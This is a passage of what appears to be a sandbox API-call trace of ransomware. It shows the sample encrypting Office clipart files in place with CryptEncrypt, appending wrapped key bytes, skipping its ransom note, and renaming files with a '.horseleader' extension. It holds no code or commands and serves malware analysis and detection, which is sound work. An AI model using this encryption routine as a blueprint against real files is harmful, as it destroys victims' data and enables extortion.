[0253.675] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00174_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.675] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 67 [0253.675] StrStrW (lpFirst="BS00174_.WMF", lpSrch=".txt") returned 0x0 [0253.675] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=8366) returned 1 [0253.675] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x20ae, lpOverlapped=0x0) returned 1 [0253.677] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffdf52, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.677] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x20ae, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x20ae, lpOverlapped=0x0) returned 1 [0253.677] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.677] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.677] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.677] CloseHandle (hObject=0x158) returned 1 [0253.678] GetProcessHeap () returned 0x780000 [0253.678] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.678] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF.horseleader") returned 79 [0253.678] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00174_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00174_.wmf.horseleader")) returned 1 [0253.678] GetProcessHeap () returned 0x780000 [0253.678] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.678] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f738600, ftCreationTime.dwHighDateTime=0x1bd4b31, ftLastAccessTime.dwLowDateTime=0x51aadd90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7f738600, ftLastWriteTime.dwHighDateTime=0x1bd4b31, nFileSizeHigh=0x0, nFileSizeLow=0x1370, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS00184_.WMF", cAlternateFileName="")) returned 1 [0253.679] lstrcmpiW (lpString1="BS00184_.WMF", lpString2="Windows") returned -1 [0253.679] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 67 [0253.679] StrStrIW (lpFirst="BS00184_.WMF", lpSrch=".horseleader") returned 0x0 [0253.679] lstrcmpW (lpString1="BS00184_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.679] lstrcmpW (lpString1="BS00184_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.679] lstrlenW (lpString=".testttjffg") returned 11 [0253.679] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.679] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.679] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.679] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00184_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.679] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 67 [0253.680] StrStrW (lpFirst="BS00184_.WMF", lpSrch=".txt") returned 0x0 [0253.680] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=4976) returned 1 [0253.680] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1370, lpOverlapped=0x0) returned 1 [0253.681] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffec90, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.681] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1370, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1370, lpOverlapped=0x0) returned 1 [0253.682] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.682] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.682] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.682] CloseHandle (hObject=0x158) returned 1 [0253.682] GetProcessHeap () returned 0x780000 [0253.682] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.682] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF.horseleader") returned 79 [0253.682] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00184_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00184_.wmf.horseleader")) returned 1 [0253.683] GetProcessHeap () returned 0x780000 [0253.683] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.683] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c60b600, ftCreationTime.dwHighDateTime=0x1bd4b31, ftLastAccessTime.dwLowDateTime=0x600889f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6c60b600, ftLastWriteTime.dwHighDateTime=0x1bd4b31, nFileSizeHigh=0x0, nFileSizeLow=0x31f4, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS00186_.WMF", cAlternateFileName="")) returned 1 [0253.683] lstrcmpiW (lpString1="BS00186_.WMF", lpString2="Windows") returned -1 [0253.683] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 67 [0253.683] StrStrIW (lpFirst="BS00186_.WMF", lpSrch=".horseleader") returned 0x0 [0253.683] lstrcmpW (lpString1="BS00186_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.683] lstrcmpW (lpString1="BS00186_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.683] lstrlenW (lpString=".testttjffg") returned 11 [0253.683] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.683] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.683] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.683] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00186_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.685] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 67 [0253.685] StrStrW (lpFirst="BS00186_.WMF", lpSrch=".txt") returned 0x0 [0253.685] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=12788) returned 1 [0253.685] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x31f4, lpOverlapped=0x0) returned 1 [0253.686] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffce0c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.686] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x31f4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x31f4, lpOverlapped=0x0) returned 1 [0253.687] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.687] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.687] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.687] CloseHandle (hObject=0x158) returned 1 [0253.687] GetProcessHeap () returned 0x780000 [0253.687] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.687] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF.horseleader") returned 79 [0253.687] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00186_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00186_.wmf.horseleader")) returned 1 [0253.688] GetProcessHeap () returned 0x780000 [0253.688] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.688] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9efd600, ftCreationTime.dwHighDateTime=0x1bd4b30, ftLastAccessTime.dwLowDateTime=0x51aadd90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf9efd600, ftLastWriteTime.dwHighDateTime=0x1bd4b30, nFileSizeHigh=0x0, nFileSizeLow=0xc20, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS00200_.WMF", cAlternateFileName="")) returned 1 [0253.688] lstrcmpiW (lpString1="BS00200_.WMF", lpString2="Windows") returned -1 [0253.688] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 67 [0253.688] StrStrIW (lpFirst="BS00200_.WMF", lpSrch=".horseleader") returned 0x0 [0253.688] lstrcmpW (lpString1="BS00200_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.688] lstrcmpW (lpString1="BS00200_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.688] lstrlenW (lpString=".testttjffg") returned 11 [0253.688] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.688] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.688] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.688] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00200_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.689] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 67 [0253.689] StrStrW (lpFirst="BS00200_.WMF", lpSrch=".txt") returned 0x0 [0253.689] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3104) returned 1 [0253.689] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xc20, lpOverlapped=0x0) returned 1 [0253.690] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff3e0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.691] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xc20, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xc20, lpOverlapped=0x0) returned 1 [0253.691] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.691] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.691] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.691] CloseHandle (hObject=0x158) returned 1 [0253.691] GetProcessHeap () returned 0x780000 [0253.691] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.691] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF.horseleader") returned 79 [0253.691] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00200_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00200_.wmf.horseleader")) returned 1 [0253.692] GetProcessHeap () returned 0x780000 [0253.692] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.692] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54fadc00, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x600889f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x54fadc00, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x634, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS00224_.WMF", cAlternateFileName="")) returned 1 [0253.692] lstrcmpiW (lpString1="BS00224_.WMF", lpString2="Windows") returned -1 [0253.692] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 67 [0253.692] StrStrIW (lpFirst="BS00224_.WMF", lpSrch=".horseleader") returned 0x0 [0253.692] lstrcmpW (lpString1="BS00224_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.692] lstrcmpW (lpString1="BS00224_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.692] lstrlenW (lpString=".testttjffg") returned 11 [0253.692] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.692] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.693] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.693] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00224_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.693] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 67 [0253.693] StrStrW (lpFirst="BS00224_.WMF", lpSrch=".txt") returned 0x0 [0253.693] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1588) returned 1 [0253.693] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x634, lpOverlapped=0x0) returned 1 [0253.695] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff9cc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.695] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x634, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x634, lpOverlapped=0x0) returned 1 [0253.695] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.695] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.695] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.695] CloseHandle (hObject=0x158) returned 1 [0253.695] GetProcessHeap () returned 0x780000 [0253.695] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.695] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF.horseleader") returned 79 [0253.695] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00224_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00224_.wmf.horseleader")) returned 1 [0253.696] GetProcessHeap () returned 0x780000 [0253.696] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.696] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62c55700, ftCreationTime.dwHighDateTime=0x1bd4b0d, ftLastAccessTime.dwLowDateTime=0x51aadd90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x62c55700, ftLastWriteTime.dwHighDateTime=0x1bd4b0d, nFileSizeHigh=0x0, nFileSizeLow=0x4bc, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS00438_.WMF", cAlternateFileName="")) returned 1 [0253.696] lstrcmpiW (lpString1="BS00438_.WMF", lpString2="Windows") returned -1 [0253.696] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 67 [0253.696] StrStrIW (lpFirst="BS00438_.WMF", lpSrch=".horseleader") returned 0x0 [0253.696] lstrcmpW (lpString1="BS00438_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.696] lstrcmpW (lpString1="BS00438_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.696] lstrlenW (lpString=".testttjffg") returned 11 [0253.696] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.696] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.696] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.696] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00438_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.697] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 67 [0253.697] StrStrW (lpFirst="BS00438_.WMF", lpSrch=".txt") returned 0x0 [0253.697] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1212) returned 1 [0253.697] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x4bc, lpOverlapped=0x0) returned 1 [0253.699] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffb44, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.699] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x4bc, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x4bc, lpOverlapped=0x0) returned 1 [0253.700] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.700] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.700] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.700] CloseHandle (hObject=0x158) returned 1 [0253.700] GetProcessHeap () returned 0x780000 [0253.700] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.700] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF.horseleader") returned 79 [0253.700] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00438_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft 